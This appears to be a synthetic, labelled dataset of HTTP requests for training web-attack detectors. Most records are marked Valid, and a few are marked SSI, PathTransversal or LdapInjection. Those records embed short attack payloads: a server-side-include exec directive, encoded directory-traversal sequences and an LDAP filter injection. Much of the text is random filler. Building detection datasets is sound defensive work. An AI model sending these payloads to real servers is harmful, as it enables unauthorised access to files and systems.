Cookie: weno1ieAr=l68mprocessing-instruction5tmpe
Cookie2: $Version="9"
Date: Wed, 28 Jan 09 14:57:21 GMT
ETag: "VR5Hc8RtYKkR9cBH"
Expect: betHis=Lihei7e
From: esr8neue@emIt.biz
If-Modified-Since: Thu, 25 Aug 05 21:45:59 CET
If-Unmodified-Since: Fri, 14 Apr 06 13:22:32 CET
If-Match: *
If-None-Match: "CM3ca74mTQU4FaVj2y"
If-Range: "soSsrt2uAutYHlg4"
Max-Forwards: 31
MIME-Version: 2.7
Pragma: SyeIttl=sbne
Proxy-Authorization: moAiit nrlemsL=4tepnceh
Authorization: wlue poihH=xeCi3
Range: 08246-7
Referer: /tdtey9e/oiejeurc/8l7r/Niyg.sh
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.5 (compatible; e2Ll9th; Open BSD i586; vuohTs6; ssow)
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: FTP/5.2 4.19.17.42:52629, HTTP/4.7 74.28.48.23:89443, fob/0.1 www.scou7o.html
Transfer-Encoding: gzip
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 755 www.7ereiwoa.htm:827 "Aexaowm" "Sat, 08 Apr 06 11:48:05 GMT"
X-Forwarded-For: 3.73.105.34
X-Serial-Number: 0274722
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21118
Start - Id: 12533
class: Valid
GET /cW/agSNhzgn/h6PR6Vj2axqTX/srsfzVtgb/msiddil9ahisrena/n_RIy7Y4ROrMyT4/antts9hucT/Byrcz@g6G3ST9K/tqmdDqQGXTZfb--YQ/dape0hfUji/2script.swf?EtecFEaolx1yun=%25ns3t6m&%uallG7t=8530187&th0dot3ewiw5Hae=riqlnga HTTP/1.0
Host: 111.120.71.63
Connection: 7tfn1eio
Accept: image/gif, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=39
Client-ip: 14.153.246.3
Cookie: yuqthtmankd=sts@-QUxIR;o7gt3r= ;KrTxyenn2ehye=37837953
Cookie2: $Version="086"
Date: Wed, 11 Mar 09 15:00:34 CET
ETag: "dRpCqRyMcTgVU0M8z"
Expect: sedlo=irnMm
From: sEao@syhnkioup.de
If-Modified-Since: Mon, 28 Jan 08 03:31:37 CET
If-Unmodified-Since: Mon, 24 Dec 07 02:18:50 CET
If-Match: *
If-None-Match: "@3YGWBvamusZr.U6w3S"
If-Range: Sun, 31 May 09 08:13:19 UTC
Max-Forwards: 4291
MIME-Version: 3.3
Pragma: cahy=0te
Proxy-Authorization: Basic c2J0ZGV0OjhMaWlu
Authorization: Basic YXRvZHZvOmFSdW5wYg==
Range: 79521-822865,4-
Referer: http://www.rnke.ch/stnu/gmpesrr/p2huob.bin
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.1 (X11; U; Solaris 9.8; sr-ii; rv:6.3.6) Gecko/57758414
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 580x349
Via: 7.2 www.wrrsj.gif, FTP/5.0 www.rbtEe.png
Transfer-Encoding: deflate
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 22.126.18.236
X-Serial-Number: 2197491883894
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12533
Start - Id: 39154
class: SSI
GET /aPT/cmoWsawaetB/4@hSc/tarai1eaiidowalms/mdxoqnlhAM/yygnrJC6NX-_RYOnfNwY/osytasIpSd/8input9iqgy2udtGP.jpg?qnalSi=anH&OTTh@=8pAxuEmu&rflon4Snciltte=48061199&nAtlrlo4=Pw HTTP/1.1
Host: www.Ledsm.com
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-chinesetrad;q=0.8, iso-8859-6, x-mac-roman, x-mac-icelandic
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.8, identity, compress;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 211.72.120.217
Cookie: w9dIo7a2ee=522;nsnudoieeo=<!-- #exec  cgi="/cgi-bin/script?ZIaqnwuunk" -->;PEqAsvD=e_DN5-3ZbqX
Cookie2: $Version="68"
Date: Sun, 30 Jan 05 13:54:33 CET
ETag: W/"ZHnd7fqGl_H.gppZJp"
Expect: 100-continue
From: ectdj@6rt19rcai.com
If-Modified-Since: Mon, 27 Mar 06 21:01:47 GMT
If-Unmodified-Since: Sat, 24 Dec 05 05:40:44 UTC
If-Match: "Gq5q2Uv2SJX1K9aAxoY"
If-None-Match: "hD7AuL5JPb2ECW3shw"
If-Range: Sat, 10 Dec 05 22:57:08 GMT
Max-Forwards: 3324
Pragma: no-cache
Proxy-Authorization: 0vsnrs eehysnd=1fiFjer
Authorization: NTLM dXZ5czFyaHB0Ylp0c3M5ZWVpbm5nMHFzSFRwZWllYTFvYWRkaHRxZW9u
Range: -6701
Referer: /yzqItb/t8ge/ldad.sh
TE: trailers
Trailer: Connection
User-Agent: asaEwasateulaposTl
UA-CPU: PowerPC
UA-Disp: 9926,2237,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: compress
Upgrade: sNrPh/3.1, DArw/8.8, seEv0h/6.6
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 83.220.235.130
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39154
Start - Id: 34902
class: Valid
PUT /kPgaF9/RP@Kxmlialld@fromlocation/tI78hbOyQ@.nsf? HTTP/1.0
Content-Length: 215
Content-Language: hnla2hha,hS
Content-Encoding: compress
Content-Location: http://mdfc.st/wacoy2c/6oeenhmE.cgi
Content-MD5: NmxuYW1zczBqbmV0dW4zcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 01:21:51 GMT
Last-Modified: Sun, 11 Nov 07 04:12:44 UTC
Host: 85.169.30.15
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: windows-1258, euc-kr, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 180.36.30.16
Cookie: oAm=03;czhkOda=h%40afGOrg;H2Mum%uR-u6shutdown=10181997
Cookie2: $Version="3"
Date: Sun, 23 Apr 06 22:28:11 UTC
ETag: W/"rQal0x1PA1W6PX-"
Expect: ifa8=i0hvnts;aneki=eaoqep
From: auaes4Eh@tlwea3.gov
If-Modified-Since: Fri, 01 Dec 06 22:42:12 GMT
If-Unmodified-Since: Sat, 20 Nov 04 13:03:41 UTC
If-Match: "owUgHdluQxeSlDsZae"
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: qafsnu nffno=Iwerhuae
Range: 04519-,499-
Referer: http://sE7w.it/oTef5pn/ndmvsf/9s1pQETd/shjcuf.php3
TE: chunked;q=0.6,deflate;q=0.6,gzip
Trailer: If-Modified-Since
User-Agent: 02sosq784tE
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: FTP/2.6 www.Ibta9h.gif:937, HTTP/2.9 www.erhhesp.html:494
Transfer-Encoding: deflate
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 624 www.Mseie.css:70014 "iiejrso6etnssr0EeteL" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 373470413656651494
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

M2SRxAMaKi3U=27&hpeSyho=e-pLm&MVJE=qh3h4e&es0v4dtvdIzt=ate%Ao\x2Txtermuroe@2Mim&usbbmsetdI=iiNI.K.k9@&cl=rkoNndt n4ssevarwS&tg_a.=rnh moit&aeedeyor2=ll&lib4vnr[fopentdI&h5eoxuo=uoy&fhSrihetefsln=47475325

End - Id: 34902
Start - Id: 11601
class: Valid
GET /dmWBcUxK@7_/o33sCKTIHH/rfwkteut/fTetqhridX0deeIn/h8atoh.bin?1kiNemaee9o9=r&ltRa=o6tlewet&ep7b6siirev=13&oaogYiihee=081&rfl4kmofpl=anynG1ttCt&zbebEccpnxaI1ie=69143112&eee=731487 HTTP/1.0
Host: 249.184.145.7
Connection: keep-alive
Accept: text/html;q=0.5, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: 7feehs3e-l;q=0.1, ootries9-auotEt, wteil5hn-TEaGyme;q=0.9, aohgvz-eylh;q=0.8, dole-inqmtape
Cache-Control: only-if-cached
Client-ip: 53.107.242.2
Cookie: chidheuoSo2s=eesst;._R.szS9serviceslB=milTqeesia3d8rn;weneh8am=ited0TairnfreMs;scriptQn0daPZ=6835;veenhuttsh=nlig 
Cookie2: $Version="2"
Date: Wed, 14 Dec 05 19:25:24 GMT
ETag: "NG7CZirueJmUZ1Rf"
Expect: ieHlenh
From: EDcpa6@fUssmevbFt.be
If-Modified-Since: Thu, 14 Aug 08 15:32:33 UTC
If-Unmodified-Since: Mon, 04 Feb 08 20:31:14 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Jun 07 19:27:57 GMT
Max-Forwards: 64
MIME-Version: 8.5
Pragma: y='e'
Proxy-Authorization: Basic aUlpOTY6bGVpbg==
Authorization: Basic bmZubmh0aTpubXRtd3Nz
Range: 4539-2283,-21
Referer: http://Aaes.gov/soku3EnU.sh
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: 2sussstmwt (tTASKIR0; 3Ti2mw)
UA-CPU: x86
UA-Disp: 503,414,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3585x2586
Via: FTP/3.8 103.162.5.94
Transfer-Encoding: deflate
Upgrade: te8ac8/1.9, wxL/4.7, hheCRo/8.9, yto/8.6
Warning: 451 www.po0to.tiff "IpT6h0ONe0T" "Sun, 10 May 09 06:25:33 GMT"
X-Forwarded-For: 61.41.0.191
X-Serial-Number: 046539438868930
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11601
Start - Id: 1094
class: Valid
GET /dzhniw/lTbinoxtermJaconnect5/nFEX-h9UN5fu/nLVmFU.Me6/GgxVDeXOI.liked/etpD@%urm/OQafN/iurmnmmiidwaerX/r8NSJdLGjK@LW4BVgqn.css?JX_53eKp5=0c7t9ross&CbVub5qT8Zvo=syfaizchblo HTTP/1.0
Host: www.ir4atmRiw5.gov:872
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: IierdN-nriaii;q=0.3, xed-w9atupi
Cache-Control: oan='3P'
Client-ip: 146.13.111.124
Cookie: ennm=Ntvar;omhndshe=9meul1TiAbPaene;TBlZ_bgsoundGsj3LL=6861659;6ehse=89;qjiajnoeceel4hn=kDT4IupCR;auai5m=2Ijsnasht
Cookie2: $Version="356"
Date: Thu, 26 Oct 06 15:04:02 UTC
ETag: W/"BDIE9oRUA6lXSiKEb4S"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Mon, 07 Apr 08 23:41:45 GMT
If-Unmodified-Since: Sat, 28 Nov 09 01:44:38 CET
If-Match: "egqQiKLL5YTL7@9"
If-None-Match: "unhfcInXIh@eYH2F"
If-Range: Tue, 02 Jan 07 22:23:31 GMT
Max-Forwards: 9028
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Basic bmkwaG9DOmV1bmN0
Range: 2006-
Referer: http://yhsqrryb.ch/ctsst/cwoen/9ooge0y/icoaeb9/opysewi.php3
TE: deflate,deflate;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: dFIZxbPouy http://www.8saIaeEn.st
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8837x3320
Via: 4.1 139.116.115.255
Transfer-Encoding: gzip
Upgrade: n3ex/4.8
Warning: 887 www.ehmEnb04.htm:93 "h3gfakch" 
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1094
Start - Id: 15744
class: Valid
GET /3rDeeScfe/n5Of/cnlsBal6eaai9igadai/ew.zS14DpN-/Hmail/IQwXscyT0o3GFk/eugesihs5hnAovmzNiE/Weh6ueAinaseaidpta98/aLbgsoundRM11/ehlekctked7/sAIF/dV.gif?gt5dropYTopen=s+ehavinge&sr=6051264&0xtbwHMF8NtA=+%3E%26htacces%3Ap%26%22Sni&Uey=722&u5Qt1cbgsound=u0&elddnamn=rq6bg&ka5ld=otlatmc9wrln4aEc&oaitEtmthetdo=3686305 HTTP/1.0
Host: www.i4tanSh.be
Connection: close
Accept: */*
Accept-Charset: windows-1253, cp-950;q=0.4
Accept-Encoding: compress, gzip;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 156.97.210.92
Cookie: d0q3igc4er0ektp=obWVdd;aetti=rftpidaas=%LY ZahG\;5upasswdz7-vLMKX=0;e5Vaoapm=hQv_;gsyiCw8=mZYd1ZDVw2
Cookie2: $Version="5"
Date: Tue, 10 Feb 04 08:32:30 UTC
ETag: "y-BoSH_Qn.9YebnIUJ"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sat, 28 Jun 08 10:16:23 CET
If-Unmodified-Since: Wed, 27 Jul 05 14:19:55 UTC
If-Match: "9-gxzkcpW_BbD40KUEyk"
If-None-Match: *
If-Range: Fri, 26 May 06 08:35:46 UTC
Max-Forwards: 0
MIME-Version: 3.3
Pragma: jwi=mge4Xs8
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: Basic eWNkeXBuOXg6ZVIxZWk=
Range: 62351-,-6
Referer: /anerao/moearOUe/iti3Z/lfdnts.htm
TE: gzip;q=0.4,trailers,chunked
Trailer: Host
User-Agent: tws3e/7.6
UA-CPU: StrongARM
UA-Disp: 0822,807,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 516x1974
Via: debebm/9.7 www.taht.png, FTP/3.1 180.206.183.241:46
Transfer-Encoding: compress
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 187 39.158.215.98 "I6Fton" "Mon, 11 Aug 08 06:05:52 GMT"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15744
Start - Id: 1488
class: Valid
GET /en/ojJoqF.N1cJO/hfyjc33a/aRP5VGh3o26FUDs/721cas_tPB/ejx_jhhntop6LAfnC3V/9acoonseggl/raWerD9Iptait/esmaticlqeoeiGqtn/onoadE/twxC/itbrbeaterrbaeWt.nsf?keee1ep=hunionn+ikAaAoem&w2bpaafcscm0lv=gqualt&2h=arma&dheshiatesyvr=replacephceAeaoUsqt%27a%27b-&2l=oJmLHOy&Snaz4dHawt=3&ue=a%25vare&Uw47IB@90E=sT.&rkpnu9esi6ecc6=0682045&rsn=Do5oeesEe+h3+o&ue=58&7Rcn=itiSetc&2aumnai=903&mswai52iAeabt9h=HrzMeriR1nep&4qOPgboot.iniod.Mposition=ws HTTP/1.1
Host: 115.26.237.158
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1250, x-mac-greek, us-ascii, iso-8859-8-i
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=49511
Client-ip: 197.37.250.172
Cookie: tr=erXC@.4N2
Cookie2: $Version="00"
Date: Sat, 26 Jun 04 19:39:17 UTC
ETag: "hcGwCVR@Z9PkWKQDZK"
Expect: icwdgeae=v0ow
From: oimobe@1tardi.ch
If-Modified-Since: Thu, 11 Aug 05 08:00:38 CET
If-Unmodified-Since: Wed, 10 Nov 04 21:39:25 GMT
If-Match: "c2n29W_zybOQjf4fH7J3"
If-None-Match: *
If-Range: Sat, 17 Apr 04 11:54:41 GMT
Max-Forwards: 716
MIME-Version: 9.3
Pragma: gp='lzbUr'
Proxy-Authorization: NTLM c2V4bTc0c2Q4Y2czRWRoaG9pZGV0cGRyOWs4c2Rjc3RhdGVvbWl0NA==
Authorization: Digest uri=http://okncR.st/9NqanV7/i5siit/tk32e/8r6tele/5aniw3a.mdb
Range: 7448-
Referer: /8dsnov.gif
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: i5eEr (gOkv4KX0I)
UA-CPU: MIPS
UA-Disp: 7926,709,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 601x836
Via: FTP/4.7 www.tt9f.tiff, etbmi/4.3 101.201.12.111:44
Transfer-Encoding: hts3
Upgrade: neitwi/0.9, uctqlB/3.1, earnsE/8.0, iaueI/8.8, udoan/5.7
Warning: 397 www.hrewoe.tiff "adPeaio" "Thu, 04 Sep 08 08:58:04 CET"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 71647517320324303
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1488
Start - Id: 44744
class: PathTransversal
GET /qtltN/a8/lcs/6jVIhhnc.MhomekY.php4?is=9346305&maAk3b2Hbody=Su%2Bhre&-8pj=xUYlJ5Es&m1saimjwosadr=%24%2B&dropcopyshutdownw@36dsystemvK=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&solwefemieen=nn&nGmtntoe=ooifrt&FszvpAH=t%3Athu8ntupaes&zsNzBJl2=copyv&eve5hss=hvartffwpen&eeo=%3Fmiasatr%3E2eupt&owiborsteqqe0i=3197319425&Alda4=sIb8a HTTP/1.0
Host: www.leenoxct1.be
Connection: opifh
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3ryTu-e;q=0.6, msl-4k, t-fa;q=0.9, 8rsy-oe9;q=0.0
Cache-Control: max-stale
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="5"
Date: Wed, 19 Jan 05 14:04:29 CET
ETag: "pRYdV20JSOUG4g2by2Bw"
Expect: ebctde=i5tn
From: p3teud@syl6D.biz
If-Modified-Since: Fri, 29 Jul 05 22:39:46 UTC
If-Unmodified-Since: Mon, 05 Apr 10 10:58:20 GMT
If-Match: *
If-None-Match: *
If-Range: "isGqpE53p-LmxJdZ-hE_"
Max-Forwards: 7009
MIME-Version: 4.7
Pragma: thhhehno=suTi6wo
Authorization: NTLM aG5TbzRqY1Z0ZXM1aWVzZm56bk1hYXB0SWlpbm8ydW9lYnRvZDhlMGQ=
Range: 218-,38304-
Referer: http://www.decrn.fr/9tiinRp/yurwos/lntd.conf
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: ttTfwtrh (fYPKxevU; nNdE@zo7; eKTKnop; epOY18kQE; oKSGXY)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44744
Start - Id: 22348
class: Valid
GET /doxPsfWo@RIA/adrus6aeztcihbe/j3lUR4DG2.jsp? HTTP/1.1
Host: 148.132.142.39
Connection: close
Accept: application/*;q=0.8, video/quicktime
Accept-Charset: cp-932, cp-932, x-mac-cyrillic
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 186.185.1.249
Cookie: 3lLevalpQ.Cmdyvbscript=uIieJfl;u3hT-inulll=mi3A;weAnrlcc=e@eglXH.aa;xgLyPwjlocationH7O=eFh;ewp1er2td=iameteoitQttbgsoundi
Cookie2: $Version="7"
Date: Sat, 21 Jul 07 23:23:49 GMT
ETag: W/"XM6cQre2HuzJOtnEKiBo"
Expect: ufij=6adhe
From: cbgs@ernYenTseb.ch
If-Modified-Since: Sun, 18 Feb 07 04:33:25 UTC
If-Unmodified-Since: Fri, 24 Feb 06 16:47:49 CET
If-Match: "ludQSqvgpA@elhH8pnQY"
If-None-Match: "elGr21jFtmy.jBnjAR"
If-Range: *
Max-Forwards: 930
MIME-Version: 6.4
Pragma: At1s='uairne3'
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: hmueet ooyTtdh=nsHotmu
Range: 562648-,892394-
Referer: /oidHCe/Tfthws/r0kts/taTb.asmx
TE: deflate;q=0.3,trailers
Trailer: Referer
User-Agent: tmttna/8.0.6.2.6
UA-CPU: 68000
UA-Disp: 369,681,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 254x8392
Via: 8.1 193.243.207.45
Transfer-Encoding: gzip
Upgrade: snoidz/4.0
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22348
Start - Id: 13019
class: Valid
GET /9uaemwbuebrerhEwwz1/teus/vTXvZ/octaanmlha/8wp-/HusrJc.php3?neee26iuhsoaqq=riE&eoaqas3eec=1&moaWt1de=1498168&i2abnxeEo=tqJy&entHlqasluhaoon=9pcexy&Kty.FF=1uidivgwinntoaeP%3Cs6&mYLMU=e+t&irr7uaienooiila=fnna0tye&zjdr=iloedte6&sp=oformmis&zOnrodovmtsug1=36 HTTP/1.1
Host: 51.148.253.15
Connection: nissadw
Accept: application/zip;q=0.2, image/*, audio/x-wav;q=0.2
Accept-Charset: gb2312;q=0.1, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: iodMn-e, ty5sxwln-othEamf
Cache-Control: iuiwo5='dcrish'
Client-ip: 82.22.221.79
Cookie: et=o|S 
Cookie2: $Version="104"
Date: Mon, 06 Nov 06 15:05:41 UTC
ETag: "yduYU7zSRafc@rj0wnmq"
Expect: 100-continue
From: hpiSlae@sh2dpea.st
If-Modified-Since: Sat, 20 Jan 07 24:01:51 UTC
If-Unmodified-Since: Thu, 09 Aug 07 22:41:41 CET
If-Match: "rKp2Lwu2lg9U2TzU"
If-None-Match: *
If-Range: Sat, 31 Jan 04 13:44:47 CET
Max-Forwards: 305
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YW53aWVhOmRzM21hZWh2
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: http://Ure9e3e.st/gerrs5lc/ttkrorh0/5f80ee/uuds/nhrre4d.asp
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: 0eeb/2.8
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: HTTP/7.0 www.TliXt.png, numrrt/0.3 241.169.255.255:5157
Transfer-Encoding: gzip
Upgrade: zflt/3.2, paby/1.7, ges/5.4, den/9.0, ioa/1.3
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13019
Start - Id: 1859
class: Valid
GET /y1/1DF.8/muX/oZt7AB9OH/wrr6atdxegnb.cfm?dd=41591555 HTTP/1.0
Host: 109.238.209.230
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: en-n, iihj6t-et;q=0.5, sr0cBt-Iog, ln4swc-yz;q=0.1
Cache-Control: no-store
Client-ip: 188.102.222.214
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Sat, 27 May 06 24:08:51 CET
ETag: W/"1vcB05ZQJrPJeyLPkpwL"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Sun, 19 Aug 07 08:11:40 CET
If-Unmodified-Since: Wed, 11 Mar 09 12:27:11 UTC
If-Match: "gYBpIwmCTe98FA2g"
If-None-Match: *
If-Range: "fVuQgLN0Hzm-llB"
Max-Forwards: 4
MIME-Version: 9.5
Pragma: flrhs0sa=ao
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM cUh0bWdzaHRkTG5mc2ZEZmV6aXR4b2Vobm9vaG5pYWEyZUM=
Range: -34624,61390-055,75119-
Referer: /enn3/m1h2nky/topq/tmeee.wmn
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: rncjheds1rxfb6w
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 063x9656
Via: 3.9 214.238.115.224, 2.9 www.eiarltPo.gif:0, 9.6 www.uwacu.jpeg
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1859
Start - Id: 38905
class: LdapInjection
GET /boij1rciwan6cIomsL/ba/gUm/i@0s/vuWbdphpxp_HAZrO0Il/s4cskML0/t@WvwT6aXcYCYwJhAB7/sA/gee3onoieycgan/ZzYKGtq_MfUal0H/ainLxisadt/hfv5aUpEVk@ZpeUNDAEX.css?ue9uo9tne6cHsnq=12kIFu&eefagnbh5swlht2=gigok%29%28%26%28objectClass+++%3D+++nqAs*%29&ot8ilqoeth=%3Bl7ete&eelcocoIh=RhfrIinserteueen HTTP/1.0
Host: 50.65.77.110
Connection: elpi
Accept: image/*;q=0.1, video/*, video/mpeg;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: LP2Aes-xh;q=0.8, xoalrEe-8iei0e;q=0.5, ert-e;q=0.9
Cache-Control: max-stale
Cookie: mieesoscr=9;atst2ser3=029923596
Date: Mon, 28 Aug 06 13:03:15 GMT
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: 100-continue
If-Modified-Since: Mon, 27 Feb 06 11:19:12 CET
If-Unmodified-Since: Sat, 21 Mar 09 19:25:31 CET
If-Match: "aAl5EME3QyB0rxU@Vku6"
If-None-Match: *
If-Range: Sat, 31 Jul 04 05:16:18 UTC
Max-Forwards: 84
MIME-Version: 7.5
Pragma: xt5='3maz'
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: 77rz aCeoso2=eaoz
Range: 82450-0782,-876
Referer: http://hhWVir.org/eoj9lBu/Tuvht/eeuehi/s3ghxaa/luo2cr.jsp
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: ohiSIdit (pVwynCE; hUp7l5)
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: gzip
X-Forwarded-For: 62.216.65.91
X-Serial-Number: 498357729
----: -------------------

null

End - Id: 38905
Start - Id: 23830
class: Valid
GET /p5Lwb/rY1v/fmaial6tptbt/sDXoJFHBHn/utehqmawergcsd6/e4ouossnntdDTl7n/Wf@28D4gN.mspx?insertpUmail=05771&efmoruagSEo8=mlocationz&eeh9a=1412307626&1teeNslnjn=otEnnaeplhtpasst&p3fOSqdeznsidp=p-UBjgjEJh&nonde8edt=2ebeNe%29itww+rea&deactyrixy=x&nS=oX3CXSrGV&2eotoOthr4=aq+xp_phpZpsock_stream1&SXD2U=oyin&suc4sl=a%40vCwtehYKo7&eots=rmX1nGlYrbtb HTTP/1.1
Host: 202.68.160.153
Connection: jnAiynrm
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=4
Client-ip: 118.45.199.188
Cookie: UNaccess_logZetchLLqmP.=1517797097
Cookie2: $Version="2"
Date: Wed, 23 Mar 05 13:50:04 UTC
ETag: W/"L3jINxLdWgkcSg_n"
Expect: eItfioDt
From: dhmtihz@kNxat8.be
If-Modified-Since: Wed, 05 Sep 07 23:28:52 GMT
If-Unmodified-Since: Mon, 20 Apr 09 22:26:47 GMT
If-Match: "hvT.I5@X0NUZM.v"
If-None-Match: "@PAiY7XjglRI7h5wQ93"
If-Range: Sat, 15 Oct 05 03:12:46 CET
Max-Forwards: 44
MIME-Version: 8.6
Pragma: aNn='t'
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: nmrr tNscqaE=suiwn
Range: 484-,58283-,553-
Referer: http://www.aowiod.net/ahoso.mpg
TE: deflate,trailers
Trailer: Host
User-Agent: aRo4enoc4/6.8
UA-CPU: PowerPC
UA-Disp: 6328,311,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 646x2979
